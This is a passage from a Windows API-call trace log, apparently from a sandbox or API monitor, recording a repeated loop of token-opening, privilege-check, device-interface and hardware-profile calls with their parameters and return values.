returned 0xfffffffe [0017.009] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.009] GetLastError () returned 0x3f0 [0017.009] GetCurrentProcess () returned 0xffffffff [0017.009] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.009] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.009] SetLastError (dwErrCode=0x522) [0017.009] CloseHandle (hObject=0x114) returned 1 [0017.010] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.010] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.010] GetLastError () returned 0x578 [0017.010] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.010] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.010] GetCurrentThread () returned 0xfffffffe [0017.010] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.010] GetLastError () returned 0x3f0 [0017.010] GetCurrentProcess () returned 0xffffffff [0017.010] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.010] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.010] SetLastError (dwErrCode=0x522) [0017.010] CloseHandle (hObject=0x114) returned 1 [0017.010] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.010] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.010] GetLastError () returned 0x578 [0017.010] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.010] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.010] GetCurrentThread () returned 0xfffffffe [0017.010] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.010] GetLastError () returned 0x3f0 [0017.010] GetCurrentProcess () returned 0xffffffff [0017.010] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.010] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.010] SetLastError (dwErrCode=0x522) [0017.010] CloseHandle (hObject=0x114) returned 1 [0017.010] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.010] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.010] GetLastError () returned 0x578 [0017.010] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.010] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.010] GetCurrentThread () returned 0xfffffffe [0017.010] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.010] GetLastError () returned 0x3f0 [0017.010] GetCurrentProcess () returned 0xffffffff [0017.010] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.010] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.010] SetLastError (dwErrCode=0x522) [0017.010] CloseHandle (hObject=0x114) returned 1 [0017.010] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.010] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.010] GetLastError () returned 0x578 [0017.010] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.010] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.011] GetCurrentThread () returned 0xfffffffe [0017.011] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.011] GetLastError () returned 0x3f0 [0017.011] GetCurrentProcess () returned 0xffffffff [0017.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.011] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.011] SetLastError (dwErrCode=0x522) [0017.011] CloseHandle (hObject=0x114) returned 1 [0017.011] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.011] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.011] GetLastError () returned 0x578 [0017.011] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.011] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.011] GetCurrentThread () returned 0xfffffffe [0017.011] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.011] GetLastError () returned 0x3f0 [0017.011] GetCurrentProcess () returned 0xffffffff [0017.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.011] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.011] SetLastError (dwErrCode=0x522) [0017.011] CloseHandle (hObject=0x114) returned 1 [0017.011] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.011] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.011] GetLastError () returned 0x578 [0017.011] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.011] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.011] GetCurrentThread () returned 0xfffffffe [0017.011] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.011] GetLastError () returned 0x3f0 [0017.011] GetCurrentProcess () returned 0xffffffff [0017.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.011] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.011] SetLastError (dwErrCode=0x522) [0017.011] CloseHandle (hObject=0x114) returned 1 [0017.011] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.011] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.011] GetLastError () returned 0x578 [0017.011] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.011] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.011] GetCurrentThread () returned 0xfffffffe [0017.011] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.011] GetLastError () returned 0x3f0 [0017.011] GetCurrentProcess () returned 0xffffffff [0017.011] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.012] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.012] SetLastError (dwErrCode=0x522) [0017.012] CloseHandle (hObject=0x114) returned 1 [0017.012] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.012] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.012] GetLastError () returned 0x578 [0017.012] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.012] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.012] GetCurrentThread () returned 0xfffffffe [0017.012] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.012] GetLastError () returned 0x3f0 [0017.012] GetCurrentProcess () returned 0xffffffff [0017.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.012] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.012] SetLastError (dwErrCode=0x522) [0017.012] CloseHandle (hObject=0x114) returned 1 [0017.012] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.012] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.012] GetLastError () returned 0x578 [0017.012] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.012] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.012] GetCurrentThread () returned 0xfffffffe [0017.012] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.012] GetLastError () returned 0x3f0 [0017.012] GetCurrentProcess () returned 0xffffffff [0017.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.012] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.012] SetLastError (dwErrCode=0x522) [0017.012] CloseHandle (hObject=0x114) returned 1 [0017.012] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.012] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.012] GetLastError () returned 0x578 [0017.012] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.012] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.012] GetCurrentThread () returned 0xfffffffe [0017.012] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.012] GetLastError () returned 0x3f0 [0017.012] GetCurrentProcess () returned 0xffffffff [0017.012] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.012] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.012] SetLastError (dwErrCode=0x522) [0017.012] CloseHandle (hObject=0x114) returned 1 [0017.012] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.012] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.013] GetLastError () returned 0x578 [0017.013] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.013] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.013] GetCurrentThread () returned 0xfffffffe [0017.013] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.013] GetLastError () returned 0x3f0 [0017.013] GetCurrentProcess () returned 0xffffffff [0017.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.013] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.013] SetLastError (dwErrCode=0x522) [0017.013] CloseHandle (hObject=0x114) returned 1 [0017.013] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.013] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.013] GetLastError () returned 0x578 [0017.013] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.013] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.013] GetCurrentThread () returned 0xfffffffe [0017.013] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.013] GetLastError () returned 0x3f0 [0017.013] GetCurrentProcess () returned 0xffffffff [0017.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.013] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.013] SetLastError (dwErrCode=0x522) [0017.013] CloseHandle (hObject=0x114) returned 1 [0017.013] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.013] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.013] GetLastError () returned 0x578 [0017.013] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.013] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.013] GetCurrentThread () returned 0xfffffffe [0017.013] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.013] GetLastError () returned 0x3f0 [0017.013] GetCurrentProcess () returned 0xffffffff [0017.013] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.013] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.013] SetLastError (dwErrCode=0x522) [0017.013] CloseHandle (hObject=0x114) returned 1 [0017.013] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.013] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.013] GetLastError () returned 0x578 [0017.013] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.013] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.013] GetCurrentThread () returned 0xfffffffe [0017.013] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.014] GetLastError () returned 0x3f0 [0017.014] GetCurrentProcess () returned 0xffffffff [0017.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.014] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.014] SetLastError (dwErrCode=0x522) [0017.014] CloseHandle (hObject=0x114) returned 1 [0017.014] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.014] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.014] GetLastError () returned 0x578 [0017.014] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.014] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.014] GetCurrentThread () returned 0xfffffffe [0017.014] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.014] GetLastError () returned 0x3f0 [0017.014] GetCurrentProcess () returned 0xffffffff [0017.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.014] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.014] SetLastError (dwErrCode=0x522) [0017.014] CloseHandle (hObject=0x114) returned 1 [0017.014] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.014] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.014] GetLastError () returned 0x578 [0017.014] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.014] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.014] GetCurrentThread () returned 0xfffffffe [0017.014] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.014] GetLastError () returned 0x3f0 [0017.014] GetCurrentProcess () returned 0xffffffff [0017.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.014] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.014] SetLastError (dwErrCode=0x522) [0017.014] CloseHandle (hObject=0x114) returned 1 [0017.014] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.014] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.014] GetLastError () returned 0x578 [0017.014] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.014] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.014] GetCurrentThread () returned 0xfffffffe [0017.014] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.014] GetLastError () returned 0x3f0 [0017.014] GetCurrentProcess () returned 0xffffffff [0017.014] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.014] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.014] SetLastError (dwErrCode=0x522) [0017.015] CloseHandle (hObject=0x114) returned 1 [0017.015] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.015] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.015] GetLastError () returned 0x578 [0017.015] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.015] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.015] GetCurrentThread () returned 0xfffffffe [0017.015] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.015] GetLastError () returned 0x3f0 [0017.015] GetCurrentProcess () returned 0xffffffff [0017.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.015] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.015] SetLastError (dwErrCode=0x522) [0017.015] CloseHandle (hObject=0x114) returned 1 [0017.015] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.015] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.015] GetLastError () returned 0x578 [0017.015] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.015] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.015] GetCurrentThread () returned 0xfffffffe [0017.015] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.015] GetLastError () returned 0x3f0 [0017.015] GetCurrentProcess () returned 0xffffffff [0017.015] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.015] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.015] SetLastError (dwErrCode=0x522) [0017.015] CloseHandle (hObject=0x114) returned 1 [0017.015] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.015] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.015] GetLastError () returned 0x578 [0017.015] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.015] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.016] GetCurrentThread () returned 0xfffffffe [0017.016] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.016] GetLastError () returned 0x3f0 [0017.016] GetCurrentProcess () returned 0xffffffff [0017.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.016] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.016] SetLastError (dwErrCode=0x522) [0017.016] CloseHandle (hObject=0x114) returned 1 [0017.016] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.016] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.016] GetLastError () returned 0x578 [0017.016] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.016] GetPriorityClass (hProcess=0x0) returned 0x0 [0017.016] GetCurrentThread () returned 0xfffffffe [0017.016] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0017.016] GetLastError () returned 0x3f0 [0017.016] GetCurrentProcess () returned 0xffffffff [0017.016] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0017.016] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0017.016] SetLastError (dwErrCode=0x522) [0017.016] CloseHandle (hObject=0x114) returned 1 [0017.016] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0017.016] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0017.016] GetLastError () returned 0x578 [0017.016] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0017.016] GetPriorityClass 